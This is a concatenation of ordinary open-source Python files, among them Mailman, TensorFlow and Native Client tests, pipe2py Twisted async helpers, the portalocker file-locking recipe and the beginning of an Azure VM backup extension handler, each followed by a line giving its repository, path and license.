projectParts.insert(0, '')
projectParts = projectParts[:-1]
projectParts.extend(layerParts)
projectParts = [elem for elem in projectParts if elem != '.']
while '..' in projectParts:
i = projectParts.index('..')
projectParts.pop(i - 1)
projectParts.pop(i - 1)
if sys.platform != 'win32':
projectParts.insert(0, '')
return '/'.join(projectParts)
def tempFileName(self, suffix):
fName = os.path.join(
tempfile.gettempdir(), unicode(uuid.uuid4()).replace('-', '') + suffix)
return fName
def exportToShapeFile(self, layer):
tmp = self.tempFileName('.shp')
QgsVectorFileWriter.writeAsVectorFormat(layer, tmp, 'utf-8', layer.crs())
return tmp
def compressShapeFile(self, filePath):
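        # Zip the shapefile together with all its sidecar files (.shx, .dbf,
        # .prj, ...) into a temporary archive ready for upload.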
tmp = self.tempFileName('.zip')
basePath = os.path.splitext(filePath)[0]
baseName = os.path.splitext(os.path.basename(filePath))[0]
zf = zipfile.ZipFile(tmp, 'w', zipfile.ZIP_DEFLATED)
for i in glob.iglob(basePath + '.*'):
ext = os.path.splitext(i)[1]
zf.write(i, baseName + ext)
zf.close()
return tmp
def paramsFromLayerTree(self, tree):
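        # Convert the internal layer tree into the root_item children
        # structure expected by the NGW web map API; if a layer has no style
        # id yet, return whatever has been built so far.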
params = []
for item in tree:
if item['itemType'] == 'layer':
if 'styleId' not in item:
return params
layer = dict(item_type='layer', display_name=item['name'], layer_style_id=item['styleId'], layer_enabled=item['enabled'], layer_adapter='image', children=[])
params.append(layer)
elif item['itemType'] == 'group':
group = dict(item_type='group', display_name=item['name'], group_expanded=item['open'], children=self.paramsFromLayerTree(item['layers']))
params.append(group)
return params
| nextgis/publish2ngw | publishdialog.py | Python | gpl-2.0 | 32,789 |
# Copyright (C) 2015 by the Free Software Foundation, Inc.
#
# This file is part of GNU Mailman.
#
# GNU Mailman is free software: you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free
# Software Foundation, either version 3 of the License, or (at your option)
# any later version.
#
# GNU Mailman is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
# more details.
#
# You should have received a copy of the GNU General Public License along with
# GNU Mailman. If not, see <http://www.gnu.org/licenses/>.
"""Test the `queues` resource."""
__all__ = [
'TestQueues',
]
import unittest
from mailman.app.lifecycle import create_list
from mailman.config import config
from mailman.database.transaction import transaction
from mailman.testing.helpers import call_api, get_queue_messages
from mailman.testing.layers import RESTLayer
from urllib.error import HTTPError
TEXT = """\
From: [email protected]
To: [email protected]
Subject: A test
Message-ID: <ant>
"""
class TestQueues(unittest.TestCase):
layer = RESTLayer
def setUp(self):
with transaction():
self._mlist = create_list('[email protected]')
def test_missing_queue(self):
# Trying to print a missing queue gives a 404.
with self.assertRaises(HTTPError) as cm:
call_api('http://localhost:9001/3.0/queues/notaq')
self.assertEqual(cm.exception.code, 404)
def test_no_such_list(self):
# POSTing to a queue with a bad list-id gives a 400.
with self.assertRaises(HTTPError) as cm:
call_api('http://localhost:9001/3.0/queues/bad', {
'list_id': 'nosuchlist.example.com',
'text': TEXT,
})
self.assertEqual(cm.exception.code, 400)
def test_inject(self):
# Injecting a message leaves the message in the queue.
starting_messages = get_queue_messages('bad')
self.assertEqual(len(starting_messages), 0)
content, response = call_api('http://localhost:9001/3.0/queues/bad', {
'list_id': 'test.example.com',
'text': TEXT})
self.assertEqual(response.status, 201)
location = response['location']
filebase = location.split('/')[-1]
# The message is in the 'bad' queue.
content, response = call_api('http://localhost:9001/3.0/queues/bad')
files = content['files']
self.assertEqual(len(files), 1)
self.assertEqual(files[0], filebase)
# Verify the files directly.
files = list(config.switchboards['bad'].files)
self.assertEqual(len(files), 1)
self.assertEqual(files[0], filebase)
# Verify the content.
items = get_queue_messages('bad')
self.assertEqual(len(items), 1)
msg = items[0].msg
# Remove some headers that get added by Mailman.
del msg['date']
self.assertEqual(msg['x-message-id-hash'],
'MS6QLWERIJLGCRF44J7USBFDELMNT2BW')
del msg['x-message-id-hash']
self.assertMultiLineEqual(msg.as_string(), TEXT)
def test_delete_file(self):
# Inject a file, then delete it.
content, response = call_api('http://localhost:9001/3.0/queues/bad', {
'list_id': 'test.example.com',
'text': TEXT})
location = response['location']
self.assertEqual(len(config.switchboards['bad'].files), 1)
# Delete the file through REST.
content, response = call_api(location, method='DELETE')
self.assertEqual(response.status, 204)
self.assertEqual(len(config.switchboards['bad'].files), 0)
| khushboo9293/mailman3 | src/mailman/rest/tests/test_queues.py | Python | gpl-2.0 | 3,843 |
#!/usr/bin/python2
# Copyright (c) 2012 The Native Client Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Tests of directory storage adapter."""
import os
import unittest
import directory_storage
import fake_storage
import gsd_storage
import hashing_tools
import hashing_tools_test
import working_directory
class TestDirectoryStorage(unittest.TestCase):
def setUp(self):
storage = fake_storage.FakeStorage()
self._dir_storage = directory_storage.DirectoryStorageAdapter(storage)
def test_WriteRead(self):
# Check that a directory can be written and then read back.
with working_directory.TemporaryWorkingDirectory() as work_dir:
temp1 = os.path.join(work_dir, 'temp1')
temp2 = os.path.join(work_dir, 'temp2')
hashing_tools_test.GenerateTestTree('write_read', temp1)
self._dir_storage.PutDirectory(temp1, 'foo')
self._dir_storage.GetDirectory('foo', temp2)
self.assertEqual(hashing_tools.StableHashPath(temp1),
hashing_tools.StableHashPath(temp2))
def test_InputUntouched(self):
# Check that PutDirectory doesn't alter its inputs.
with working_directory.TemporaryWorkingDirectory() as work_dir:
temp1 = os.path.join(work_dir, 'temp1')
hashing_tools_test.GenerateTestTree('input_untouched', temp1)
h1 = hashing_tools.StableHashPath(temp1)
self._dir_storage.PutDirectory(temp1, 'hello')
h2 = hashing_tools.StableHashPath(temp1)
self.assertEqual(h1, h2)
def test_URLsPropagate(self):
# Check that consistent non-None URLs come from get and put.
with working_directory.TemporaryWorkingDirectory() as work_dir:
temp1 = os.path.join(work_dir, 'temp1')
temp2 = os.path.join(work_dir, 'temp2')
hashing_tools_test.GenerateTestTree('url_propagate', temp1)
url1 = self._dir_storage.PutDirectory(temp1, 'me')
url2 = self._dir_storage.GetDirectory('me', temp2)
self.assertEqual(url1, url2)
self.assertNotEqual(None, url1)
def test_BadWrite(self):
def call(cmd):
return 1
storage = gsd_storage.GSDStorage(
gsutil=['mygsutil'],
write_bucket='mybucket',
read_buckets=[],
call=call)
dir_storage = directory_storage.DirectoryStorageAdapter(storage)
# Check that storage exceptions come thru on failure.
with working_directory.TemporaryWorkingDirectory() as work_dir:
temp1 = os.path.join(work_dir, 'temp1')
hashing_tools_test.GenerateTestTree('bad_write', temp1)
self.assertRaises(gsd_storage.GSDStorageError,
dir_storage.PutDirectory, temp1, 'bad')
def test_BadRead(self):
# Check that storage exceptions come thru on failure.
with working_directory.TemporaryWorkingDirectory() as work_dir:
temp1 = os.path.join(work_dir, 'temp1')
self.assertEqual(None, self._dir_storage.GetDirectory('foo', temp1))
if __name__ == '__main__':
unittest.main()
| Lind-Project/native_client | build/directory_storage_test.py | Python | bsd-3-clause | 3,028 |
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for pandas_io."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import sys
# TODO: #6568 Remove this hack that makes dlopen() not crash.
if hasattr(sys, 'getdlopenflags') and hasattr(sys, 'setdlopenflags'):
import ctypes
sys.setdlopenflags(sys.getdlopenflags() | ctypes.RTLD_GLOBAL)
import numpy as np
from tensorflow.contrib.learn.python.learn.learn_io import pandas_io
from tensorflow.python.framework import errors
from tensorflow.python.platform import test
from tensorflow.python.training import coordinator
from tensorflow.python.training import queue_runner_impl
# pylint: disable=g-import-not-at-top
try:
import pandas as pd
HAS_PANDAS = True
except ImportError:
HAS_PANDAS = False
class PandasIoTest(test.TestCase):
def makeTestDataFrame(self):
index = np.arange(100, 104)
a = np.arange(4)
b = np.arange(32, 36)
x = pd.DataFrame({'a': a, 'b': b}, index=index)
y = pd.Series(np.arange(-32, -28), index=index)
return x, y
def callInputFnOnce(self, input_fn, session):
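    # Build the input graph, start the queue runners, evaluate the tensors
    # once and shut the coordinator down again.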
results = input_fn()
coord = coordinator.Coordinator()
threads = queue_runner_impl.start_queue_runners(session, coord=coord)
result_values = session.run(results)
coord.request_stop()
coord.join(threads)
return result_values
def testPandasInputFn_IndexMismatch(self):
if not HAS_PANDAS:
return
x, _ = self.makeTestDataFrame()
y_noindex = pd.Series(np.arange(-32, -28))
with self.assertRaises(ValueError):
pandas_io.pandas_input_fn(
x, y_noindex, batch_size=2, shuffle=False, num_epochs=1)
def testPandasInputFn_ProducesExpectedOutputs(self):
if not HAS_PANDAS:
return
with self.test_session() as session:
x, y = self.makeTestDataFrame()
input_fn = pandas_io.pandas_input_fn(
x, y, batch_size=2, shuffle=False, num_epochs=1)
features, target = self.callInputFnOnce(input_fn, session)
self.assertAllEqual(features['a'], [0, 1])
self.assertAllEqual(features['b'], [32, 33])
self.assertAllEqual(target, [-32, -31])
def testPandasInputFn_OnlyX(self):
if not HAS_PANDAS:
return
with self.test_session() as session:
x, _ = self.makeTestDataFrame()
input_fn = pandas_io.pandas_input_fn(
x, y=None, batch_size=2, shuffle=False, num_epochs=1)
features = self.callInputFnOnce(input_fn, session)
self.assertAllEqual(features['a'], [0, 1])
self.assertAllEqual(features['b'], [32, 33])
def testPandasInputFn_ExcludesIndex(self):
if not HAS_PANDAS:
return
with self.test_session() as session:
x, y = self.makeTestDataFrame()
input_fn = pandas_io.pandas_input_fn(
x, y, batch_size=2, shuffle=False, num_epochs=1)
features, _ = self.callInputFnOnce(input_fn, session)
self.assertFalse('index' in features)
def assertInputsCallableNTimes(self, input_fn, session, n):
inputs = input_fn()
coord = coordinator.Coordinator()
threads = queue_runner_impl.start_queue_runners(session, coord=coord)
for _ in range(n):
session.run(inputs)
with self.assertRaises(errors.OutOfRangeError):
session.run(inputs)
coord.request_stop()
coord.join(threads)
def testPandasInputFn_RespectsEpoch_NoShuffle(self):
if not HAS_PANDAS:
return
with self.test_session() as session:
x, y = self.makeTestDataFrame()
input_fn = pandas_io.pandas_input_fn(
x, y, batch_size=4, shuffle=False, num_epochs=1)
self.assertInputsCallableNTimes(input_fn, session, 1)
def testPandasInputFn_RespectsEpoch_WithShuffle(self):
if not HAS_PANDAS:
return
with self.test_session() as session:
x, y = self.makeTestDataFrame()
input_fn = pandas_io.pandas_input_fn(
x, y, batch_size=4, shuffle=True, num_epochs=1)
self.assertInputsCallableNTimes(input_fn, session, 1)
def testPandasInputFn_RespectsEpoch_WithShuffleAutosize(self):
if not HAS_PANDAS:
return
with self.test_session() as session:
x, y = self.makeTestDataFrame()
input_fn = pandas_io.pandas_input_fn(
x, y, batch_size=2, shuffle=True, queue_capacity=None, num_epochs=2)
self.assertInputsCallableNTimes(input_fn, session, 4)
def testPandasInputFn_RespectsEpochUnevenBatches(self):
if not HAS_PANDAS:
return
x, y = self.makeTestDataFrame()
with self.test_session() as session:
input_fn = pandas_io.pandas_input_fn(
x, y, batch_size=3, shuffle=False, num_epochs=1)
# Before the last batch, only one element of the epoch should remain.
self.assertInputsCallableNTimes(input_fn, session, 2)
def testPandasInputFn_Idempotent(self):
if not HAS_PANDAS:
return
x, y = self.makeTestDataFrame()
for _ in range(2):
pandas_io.pandas_input_fn(
x, y, batch_size=2, shuffle=False, num_epochs=1)()
for _ in range(2):
pandas_io.pandas_input_fn(
x, y, batch_size=2, shuffle=True, num_epochs=1)()
if __name__ == '__main__':
test.main()
| AsimmHirani/ISpyPi | tensorflow/contrib/tensorflow-master/tensorflow/contrib/learn/python/learn/learn_io/pandas_io_test.py | Python | apache-2.0 | 5,832 |
import modelx as mx
import pytest
@pytest.fixture
def duplicate_inheritance_model():
"""
Sub <------------------- Base1
| |
Child <--------- Base2 Child
| | |
GChild <--Base3 GChild GChild
| | |
foo foo foo
"""
m = mx.new_model()
m.new_space("Sub").new_space("Child").new_space("GChild")
m.new_space("Base1").new_space("Child").new_space("GChild").new_cells(
"foo", formula=lambda: "Under Base1")
m.new_space("Base2").new_space("GChild").new_cells(
"foo", formula=lambda: "Under Base2")
m.new_space("Base3").new_cells(
"foo", formula=lambda: "Under Base3")
return m
def test_nearest_first(duplicate_inheritance_model):
m = duplicate_inheritance_model
m.Sub.add_bases(m.Base1)
m.Sub.Child.add_bases(m.Base2)
m.Sub.Child.GChild.add_bases(m.Base3)
assert "Under Base3" == m.Sub.Child.GChild.foo()
def test_farthest_first(duplicate_inheritance_model):
m = duplicate_inheritance_model
m.Sub.Child.GChild.add_bases(m.Base3)
m.Sub.Child.add_bases(m.Base2)
m.Sub.add_bases(m.Base1)
assert "Under Base3" == m.Sub.Child.GChild.foo()
| fumitoh/modelx | modelx/tests/core/space/inheritance/test_add_bases.py | Python | gpl-3.0 | 1,269 |
# -*- coding: utf-8 -*-
# vim: sw=4:ts=4:expandtab
"""Twisted utility functions"""
from __future__ import (
absolute_import, division, print_function, with_statement,
unicode_literals)
import itertools as it
from os import environ
from sys import executable
from functools import partial
from twisted.internet import defer
from twisted.internet.defer import (
inlineCallbacks, maybeDeferred, gatherResults, returnValue)
from twisted.internet.task import coiterate, cooperate
from twisted.internet.utils import getProcessOutput
from pipe2py.lib import utils
WORKERS = 50
asyncNone = defer.succeed(None)
asyncReturn = partial(defer.succeed)
def _get_work(asyncCallable, callback, map_func, *iterables):
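    # Wrap asyncCallable so each result is handed to callback, then map the
    # wrapper over the iterables, producing the lazy stream of deferreds that
    # coiterate/cooperate will consume.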
func = lambda *args: asyncCallable(*args).addCallback(callback)
return map_func(func, *iterables)
def _parallel(work, asyncCallable):
deferreds = it.repeat(coiterate(work), WORKERS)
return gatherResults(deferreds, consumeErrors=True)
# helper functions
def coop(asyncCallable, callback, *iterables):
work = _get_work(asyncCallable, callback, it.imap, *iterables)
return coiterate(work)
def asyncParallel(asyncCallable, callback, *iterables):
work = _get_work(asyncCallable, callback, it.imap, *iterables)
return _parallel(work, asyncCallable)
def coopStar(asyncCallable, callback, iterable):
work = _get_work(asyncCallable, callback, it.starmap, *[iterable])
return coiterate(work)
def asyncStarParallel(asyncCallable, callback, iterable):
work = _get_work(asyncCallable, callback, it.starmap, *[iterable])
return _parallel(work, asyncCallable)
# End user functions
def deferToProcess(source, function, *args, **kwargs):
command = "from %s import %s\n%s(*%s, **%s)" % (
source, function, function, args, kwargs)
return getProcessOutput(executable, ['-c', command], environ)
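# Illustrative note (not in the original source): a call such as
#   deferToProcess('math', 'sqrt', 16)
# builds the command string "from math import sqrt\nsqrt(*(16,), **{})" and
# runs it with the current interpreter via getProcessOutput, returning a
# Deferred that fires with the child's stdout.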
def trueDeferreds(sources, filter_func=None):
return it.imap(partial(maybeDeferred, it.ifilter, filter_func), sources)
@inlineCallbacks
def coopReduce(func, iterable, initializer=None):
it = iter(iterable)
x = initializer or next(it)
def cooperator(func, it, x):
for y in it:
x = func(x, y)
yield
returnValue(x)
task = cooperate(cooperator(func, it, x))
result = yield task.whenDone()
returnValue(result)
def asyncReduce(asyncCallable, iterable, initializer=None):
it = iter(iterable)
x = initializer or next(it)
@inlineCallbacks
def work(asyncCallable, it, x):
for y in it:
x = yield asyncCallable(x, y)
returnValue(x)
return work(asyncCallable, it, x)
@inlineCallbacks
def asyncCmap(asyncCallable, *iterables):
"""itertools.imap for deferred callables using cooperative multitasking
"""
results = []
yield coop(asyncCallable, results.append, *iterables)
returnValue(results)
@inlineCallbacks
def asyncPmap(asyncCallable, *iterables):
"""itertools.imap for deferred callables using parallel cooperative
multitasking
"""
results = []
yield asyncParallel(asyncCallable, results.append, *iterables)
returnValue(results)
def asyncImap(asyncCallable, *iterables):
"""itertools.imap for deferred callables
"""
deferreds = it.imap(asyncCallable, *iterables)
return gatherResults(deferreds, consumeErrors=True)
@inlineCallbacks
def asyncStarCmap(asyncCallable, iterable):
"""itertools.starmap for deferred callables using cooperative multitasking
"""
results = []
yield coopStar(asyncCallable, results.append, iterable)
returnValue(results)
@inlineCallbacks
def asyncStarPmap(asyncCallable, iterable):
"""itertools.starmap for deferred callables using parallel cooperative
multitasking
"""
results = []
yield asyncStarParallel(asyncCallable, results.append, iterable)
returnValue(results)
def asyncStarMap(asyncCallable, iterable):
"""itertools.starmap for deferred callables
"""
deferreds = it.starmap(asyncCallable, iterable)
return gatherResults(deferreds, consumeErrors=True)
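# --- Illustrative sketch (not part of the original module) ---
# Minimal example of the calling convention shared by the helpers above: each
# takes a Deferred-returning callable and fires with the list of results. The
# doubling callable below is hypothetical.
@inlineCallbacks
def _example_async_imap():
    async_double = lambda x: asyncReturn(x * 2)  # stand-in for real async work
    doubled = yield asyncImap(async_double, [1, 2, 3])
    returnValue(doubled)  # fires with [2, 4, 6]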
# Internal functions
_apply_func = partial(utils._apply_func, map_func=asyncStarMap)
_map_func = asyncImap
def asyncBroadcast(_INPUT, *asyncCallables):
"""copies a source and delivers the items to multiple functions
_INPUT = it.repeat({'title': 'foo'}, 3)
/--> foo2bar(_INPUT) --> _OUTPUT1 == it.repeat('bar', 3)
/
_INPUT ---> foo2baz(_INPUT) --> _OUTPUT2 == it.repeat('baz', 3)
\
          \--> foo2qux(_INPUT) --> _OUTPUT3 == it.repeat('qux', 3)
The way you would construct such a flow in code would be::
succeed = twisted.internet.defer.succeed
foo2bar = lambda item: succeed(item['title'].replace('foo', 'bar'))
foo2baz = lambda item: succeed(item['title'].replace('foo', 'baz'))
        foo2qux = lambda item: succeed(item['title'].replace('foo', 'qux'))
asyncBroadcast(_INPUT, foo2bar, foo2baz, foo2qux)
"""
kwargs = {'map_func': _map_func, 'apply_func': _apply_func}
return utils.broadcast(_INPUT, *asyncCallables, **kwargs)
def asyncDispatch(splits, *asyncCallables):
"""takes multiple sources (returned by asyncDispatch or asyncBroadcast)
and delivers the items to multiple functions
_INPUT1 = it.repeat('bar', 3)
_INPUT2 = it.repeat('baz', 3)
_INPUT3 = it.repeat('qux', 3)
_INPUT1 --> double(_INPUT) --> _OUTPUT1 == it.repeat('barbar', 3)
_INPUT2 --> triple(_INPUT) --> _OUTPUT2 == it.repeat('bazbazbaz', 3)
_INPUT3 --> quadruple(_INPUT) --> _OUTPUT3 == it.repeat('quxquxquxqux', 3)
The way you would construct such a flow in code would be::
succeed = twisted.internet.defer.succeed
_INPUT = it.repeat({'title': 'foo'}, 3)
splits = asyncBroadcast(_INPUT, foo2bar, foo2baz, foo2qux)
double = lambda item: succeed(item * 2)
triple = lambda item: succeed(item * 3)
quadruple = lambda item: succeed(item * 4)
        asyncDispatch(splits, double, triple, quadruple)
"""
kwargs = {'map_func': _map_func, 'apply_func': _apply_func}
return utils.dispatch(splits, *asyncCallables, **kwargs)
| kazeeki/pipe2py | pipe2py/twisted/utils.py | Python | gpl-2.0 | 6,204 |
# portalocker.py - Cross-platform (posix/nt) API for flock-style file locking.
# Requires python 1.5.2 or better.
#
# sostler May 2008
# Taken from: http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/65203
"""Cross-platform (posix/nt) API for flock-style file locking.
Synopsis:
import portalocker
file = open("somefile", "r+")
portalocker.lock(file, portalocker.LOCK_EX)
file.seek(12)
file.write("foo")
file.close()
If you know what you're doing, you may choose to
portalocker.unlock(file)
before closing the file, but why?
Methods:
lock( file, flags )
unlock( file )
Constants:
LOCK_EX
LOCK_SH
LOCK_NB
Exceptions:
LockException
Notes:
For the 'nt' platform, this module requires the Python Extensions for Windows.
Be aware that this may not work as expected on Windows 95/98/ME.
History:
I learned the win32 technique for locking files from sample code
provided by John Nielsen <[email protected]> in the documentation
that accompanies the win32 modules.
Author: Jonathan Feinberg <[email protected]>,
Lowell Alleman <[email protected]>
Version: $Id: portalocker.py 5474 2008-05-16 20:53:50Z lowell $
"""
__all__ = [
"lock",
"unlock",
"LOCK_EX",
"LOCK_SH",
"LOCK_NB",
"LockException",
]
import os
class LockException(Exception):
# Error codes:
LOCK_FAILED = 1
if os.name == 'nt':
import win32con
import win32file
import pywintypes
LOCK_EX = win32con.LOCKFILE_EXCLUSIVE_LOCK
LOCK_SH = 0 # the default
LOCK_NB = win32con.LOCKFILE_FAIL_IMMEDIATELY
# is there any reason not to reuse the following structure?
__overlapped = pywintypes.OVERLAPPED()
elif os.name == 'posix':
import fcntl
LOCK_EX = fcntl.LOCK_EX
LOCK_SH = fcntl.LOCK_SH
LOCK_NB = fcntl.LOCK_NB
else:
raise RuntimeError, "PortaLocker only defined for nt and posix platforms"
if os.name == 'nt':
def lock(file, flags):
hfile = win32file._get_osfhandle(file.fileno())
try:
win32file.LockFileEx(hfile, flags, 0, -0x10000, __overlapped)
except pywintypes.error, exc_value:
# error: (33, 'LockFileEx', 'The process cannot access the file because another process has locked a portion of the file.')
if exc_value[0] == 33:
raise LockException(LockException.LOCK_FAILED, exc_value[2])
else:
# Q: Are there exceptions/codes we should be dealing with here?
raise
def unlock(file):
hfile = win32file._get_osfhandle(file.fileno())
try:
win32file.UnlockFileEx(hfile, 0, -0x10000, __overlapped)
except pywintypes.error, exc_value:
if exc_value[0] == 158:
# error: (158, 'UnlockFileEx', 'The segment is already unlocked.')
# To match the 'posix' implementation, silently ignore this error
pass
else:
# Q: Are there exceptions/codes we should be dealing with here?
raise
elif os.name == 'posix':
def lock(file, flags):
try:
fcntl.flock(file.fileno(), flags)
except IOError, exc_value:
# IOError: [Errno 11] Resource temporarily unavailable
if exc_value[0] == 11:
raise LockException(LockException.LOCK_FAILED, exc_value[1])
else:
raise
def unlock(file):
fcntl.flock(file.fileno(), fcntl.LOCK_UN)
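# --- Illustrative sketch (not part of the original recipe) ---
# Non-blocking acquisition: with LOCK_NB the call raises LockException
# (code LOCK_FAILED) instead of waiting while another process holds the lock.
# The file name is only an example.
def _example_nonblocking_lock(path="somefile.txt"):
    handle = open(path, "a+")
    try:
        lock(handle, LOCK_EX | LOCK_NB)
        handle.write("got the lock\n")
        unlock(handle)
    except LockException:
        print "lock is held by another process; skipping"
    finally:
        handle.close()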
if __name__ == '__main__':
from time import time, strftime, localtime
import sys
import portalocker
log = open('log.txt', "a+")
portalocker.lock(log, portalocker.LOCK_EX)
timestamp = strftime("%m/%d/%Y %H:%M:%S\n", localtime(time()))
log.write( timestamp )
print "Wrote lines. Hit enter to release lock."
dummy = sys.stdin.readline()
log.close() | zepheira/exhibit | src/webapp/api/extensions/curate/files/admin/portalocker.py | Python | bsd-3-clause | 3,905 |
#!/usr/bin/env python
#
# VM Backup extension
#
# Copyright 2014 Microsoft Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Requires Python 2.7+
#
import array
import base64
import os
import os.path
import re
import json
import string
import subprocess
import sys
import imp
import time
import shlex
import traceback
import httplib
import xml.parsers.expat
import datetime
from os.path import join
from mounts import Mounts
from mounts import Mount
from patch import *
from fsfreezer import FsFreezer
from common import CommonVariables
from parameterparser import ParameterParser
from Utils import HandlerUtil
from urlparse import urlparse
from snapshotter import Snapshotter
from backuplogger import Backuplogger
from blobwriter import BlobWriter
from taskidentity import TaskIdentity
from MachineIdentity import MachineIdentity
#Main function is the only entrence to this extension handler
def main():
global MyPatching,backup_logger,hutil
HandlerUtil.LoggerInit('/var/log/waagent.log','/dev/stdout')
HandlerUtil.waagent.Log("%s started to handle." % (CommonVariables.extension_name))
hutil = HandlerUtil.HandlerUtility(HandlerUtil.waagent.Log, HandlerUtil.waagent.Error, CommonVariables.extension_name)
backup_logger = Backuplogger(hutil)
MyPatching = GetMyPatching(logger = backup_logger)
for a in sys.argv[1:]:
if re.match("^([-/]*)(disable)", a):
disable()
elif re.match("^([-/]*)(uninstall)", a):
uninstall()
elif re.match("^([-/]*)(install)", a):
install()
elif re.match("^([-/]*)(enable)", a):
enable()
elif re.match("^([-/]*)(update)", a):
update()
def install():
hutil.do_parse_context('Install')
hutil.do_exit(0, 'Install','success','0', 'Install Succeeded')
def timedelta_total_seconds(delta):
if not hasattr(datetime.timedelta, 'total_seconds'):
return delta.days * 86400 + delta.seconds
else:
return delta.total_seconds()
def do_backup_status_report(operation, status, status_code, message, taskId, commandStartTimeUTCTicks, blobUri):
backup_logger.log("{0},{1},{2},{3}".format(operation, status, status_code, message))
time_delta = datetime.datetime.utcnow() - datetime.datetime(1970, 1, 1)
time_span = timedelta_total_seconds(time_delta) * 1000
date_string = r'\/Date(' + str((int)(time_span)) + r')\/'
date_place_holder = 'e2794170-c93d-4178-a8da-9bc7fd91ecc0'
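    # Assumed rationale (not stated in the original source): json.dumps would
    # escape the backslashes in the literal '\/Date(...)\/' form expected by
    # the consumer, so a placeholder GUID is serialized first and swapped for
    # the real date string after serialization.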
stat = [{
"version" : hutil._context._version,
"timestampUTC" : date_place_holder,
"status" : {
"name" : hutil._context._name,
"operation" : operation,
"status" : status,
"code" : status_code,
"taskId":taskId,
"commandStartTimeUTCTicks":commandStartTimeUTCTicks,
"formattedMessage" : {
"lang" : "en-US",
"message" : message
}
}
}]
status_report_msg = json.dumps(stat)
status_report_msg = status_report_msg.replace(date_place_holder,date_string)
blobWriter = BlobWriter(hutil)
blobWriter.WriteBlob(status_report_msg,blobUri)
def exit_with_commit_log(error_msg, para_parser):
backup_logger.log(error_msg, True, 'Error')
if(para_parser is not None and para_parser.logsBlobUri is not None):
backup_logger.commit(para_parser.logsBlobUri)
sys.exit(0)
def convert_time(utcTicks):
return datetime.datetime(1, 1, 1) + datetime.timedelta(microseconds = utcTicks / 10)
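# Illustrative note (assumption): utcTicks is a .NET-style tick count, i.e.
# 100-nanosecond units counted from 0001-01-01, so dividing by 10 yields
# microseconds. For example, 621355968000000000 ticks maps to the Unix epoch:
#   convert_time(621355968000000000) == datetime.datetime(1970, 1, 1)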
def enable():
#this is using the most recent file timestamp.
hutil.do_parse_context('Enable')
freezer = FsFreezer(patching= MyPatching, logger = backup_logger)
unfreeze_result = None
snapshot_result = None
freeze_result = None
global_error_result = None
para_parser = None
run_result = 1
error_msg = ''
run_status = None
# precheck
freeze_called = False
try:
# we need to freeze the file system first
backup_logger.log('starting to enable', True)
# handle the restoring scenario.
mi = MachineIdentity()
stored_identity = mi.stored_identity()
if(stored_identity is None):
mi.save_identity()
else:
current_identity = mi.current_identity()
if(current_identity != stored_identity):
current_seq_no = -1
backup_logger.log("machine identity not same, set current_seq_no to " + str(current_seq_no) + " " + str(stored_identity) + " " + str(current_identity), True)
hutil.set_inused_config_seq(current_seq_no)
mi.save_identity()
hutil.save_seq()
"""
    protectedSettings is the privateConfig passed from PowerShell.
    Watch out: _context_config uses the freshest timestamp available.
    If the time sync is alive, this should be right.
"""
protected_settings = hutil._context._config['runtimeSettings'][0]['handlerSettings'].get('protectedSettings')
public_settings = hutil._context._config['runtimeSettings'][0]['handlerSettings'].get('publicSettings')
para_parser = ParameterParser(protected_settings, public_settings)
if(para_parser.commandStartTimeUTCTicks is not None and para_parser.commandStartTimeUTCTicks != ""):
utcTicksLong = long(para_parser.commandStartTimeUTCTicks)
commandStartTime = convert_time(utcTicksLong)
utcNow = datetime.datetime.utcnow()
backup_logger.log('command start time is ' + str(commandStartTime) + " and utcNow is " + str(utcNow))
timespan = utcNow - commandStartTime
THIRTY_MINUTES = 30 * 60 # in seconds
# handle the machine identity for the restoration scenario.
total_span_in_seconds = timespan.days * 24 * 60 * 60 + timespan.seconds
backup_logger.log('timespan is ' + str(timespan) + ' ' + str(total_span_in_seconds))
if(abs(total_span_in_seconds) > THIRTY_MINUTES):
error_msg = 'the call time stamp is out of date. so skip it.'
exit_with_commit_log(error_msg, para_parser)
if(para_parser.taskId is not None and para_parser.taskId != ""):
taskIdentity = TaskIdentity()
taskIdentity.save_identity(para_parser.taskId)
commandToExecute = para_parser.commandToExecute
#validate all the required parameter here
if(commandToExecute.lower() == CommonVariables.iaas_install_command):
backup_logger.log('install succeed.',True)
run_status = 'success'
error_msg = 'Install Succeeded'
run_result = CommonVariables.success
backup_logger.log(error_msg)
elif(commandToExecute.lower() == CommonVariables.iaas_vmbackup_command):
if(para_parser.backup_metadata is None or para_parser.public_config_obj is None or para_parser.private_config_obj is None):
run_result = CommonVariables.error_parameter
run_status = 'error'
error_msg = 'required field empty or not correct'
backup_logger.log(error_msg, False, 'Error')
else:
backup_logger.log('commandToExecute is ' + commandToExecute, True)
"""
                make sure we do not write to the log while the file system is frozen.
"""
backup_logger.log('doing freeze now...', True)
freeze_called = True
freeze_result = freezer.freezeall()
backup_logger.log('freeze result ' + str(freeze_result))
# check whether we freeze succeed first?
if(freeze_result is not None and len(freeze_result.errors) > 0):
run_result = CommonVariables.error
run_status = 'error'
error_msg = 'Enable failed with error: ' + str(freeze_result)
backup_logger.log(error_msg, False, 'Warning')
else:
backup_logger.log('doing snapshot now...')
snap_shotter = Snapshotter(backup_logger)
snapshot_result = snap_shotter.snapshotall(para_parser)
backup_logger.log('snapshotall ends...')
if(snapshot_result is not None and len(snapshot_result.errors) > 0):
error_msg = 'snapshot result: ' + str(snapshot_result)
run_result = CommonVariables.error
run_status = 'error'
backup_logger.log(error_msg, False, 'Error')
else:
